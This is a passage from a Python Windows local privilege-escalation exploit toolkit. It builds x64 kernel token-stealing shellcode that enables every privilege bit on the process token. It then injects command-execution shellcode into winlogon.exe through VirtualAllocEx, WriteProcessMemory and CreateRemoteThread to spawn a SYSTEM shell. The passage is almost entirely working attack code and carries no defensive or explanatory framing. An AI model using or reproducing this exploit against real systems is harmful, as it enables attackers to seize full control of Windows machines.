	if KTHREAD_Process > 0x7f:
		shellcode = shellcode + "\x48\x8b\x80" + struct.pack("B",KTHREAD_Process) + "\x00\x00\x00" # mov	 rax, [rax+0x68]		 ;Get current KTHREAD_Process address
	else:
		shellcode = shellcode + "\x48\x8b\x40" + struct.pack("B",KTHREAD_Process)
	
	shellcode = shellcode + ("\x48\x89\xc1"												# mov	 rcx, rax			;Copy current KTHREAD_Process address to RCX
	"\x48\x81\xC1" + struct.pack("H",EPROCESS_Token) + "\x00\x00"						# add rcx, 0x358 ; offset the Tokens
	"\x48\x8B\x01"																		# mov rax, qword ptr [rcx] ; copy pointer
	"\x48\x83\xE0\xF0"																	# and rax, 0x0FFFFFFFFFFFFFFF0 ; clear last 4 bits
	"\x48\xC7\x40\x48\xFF\xFF\xFF\xFF"													# mov qword ptr [rax+0x48], 0x0FFFFFFFFFFFFFFFF ; set the Enabled bits
	"\x48\xC7\x40\x40\xFF\xFF\xFF\xFF"													# mov qword ptr [rax+0x40], 0x0FFFFFFFFFFFFFFFF ; set the Present bits
	)
	
	shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack
	if RETVAL == "":
		shellcode += "\xc3"						#retn
	else:
		shellcode += "\xc2" + RETVAL + "\x00"	# ret	0x8	
	
	shellcode = shellcode + '\x90' * (len(shellcode) % 4)
	return shellcode

def tokenstealing(RETVAL, extra = ""):
	print "[*] Creating token stealing shellcode"
	if platform.architecture()[0] == '64bit': return tokenstealingx64(RETVAL, extra)
	else: return tokenstealingx86(RETVAL, extra)
	
def getosvariablesx():
	if platform.architecture()[0] == '64bit': return getosvariablesx64()
	else: return getosvariablesx86()
	
def inject_shell(manager_palette=None, worker_palette=None):
	"""Impersonate privileged token and inject shellcode into winlogon.exe"""

	# Get winlogon.exe pid
	if manager_palette != None and worker_palette != None:
		pointer_EPROCESS = leak_eprocess_address_palette(manager_palette, worker_palette)
		(pid, pid_EPROCESS) = find_pid_and_eprocess_by_name_palette(manager_palette, worker_palette, pointer_EPROCESS, "winlogon.exe")
	else:
		pid = getpid("winlogon.exe")
	# Get a handle to the winlogon process we are injecting into 
	hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))

	if not hProcess:
		print "[-] Couldn't acquire a handle to PID: %s" % pid
		sys.exit(-1)

	print "[+] Obtained handle 0x%x for the winlogon.exe process" % hProcess

	# Creating shellcode buffer to inject into the host process
	sh = create_string_buffer(SHELLCODE_EXEC_CMD_X64, len(SHELLCODE_EXEC_CMD_X64))
	code_size = len(SHELLCODE_EXEC_CMD_X64)	

	# Allocate some space for the shellcode (in the program memory)
	sh_address = kernel32.VirtualAllocEx(hProcess, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)
	if not sh_address:
		print "[-] Could not allocate shellcode in the remote process"
		getLastError()
		sys.exit(-1)

	print "[+] Allocated memory at address 0x%x" % sh_address

	# Inject shellcode in to winlogon.exe process space
	written = LPVOID(0)
	shellcode = LPVOID(sh_address)
	dwStatus = kernel32.WriteProcessMemory(hProcess, shellcode, sh, code_size, byref(written))
	if not dwStatus:
		print "[-] Could not write shellcode into winlogon.exe, exiting..."
		getLastError()
		sys.exit(-1)

	print "[+] Injected %d bytes of shellcode to 0x%x" % (written.value, sh_address)

	# Now we create the remote thread and point its entry routine to be head of 
	# our shellcode
	thread_id = HANDLE(0)
	if not kernel32.CreateRemoteThread(hProcess, 0, 0, sh_address, 0, 0, byref(thread_id)):
		print "[-] Failed to inject shellcode into winlogon.exe, exiting..."
		sys.exit()

	print "[+] Remote thread  0x%08x created" % thread_id.value
	print "[+] Spawning SYSTEM shell..."
	# Kill python process to kill the window and avoid BSODs
	os.kill(os.getpid(), signal.SIGABRT)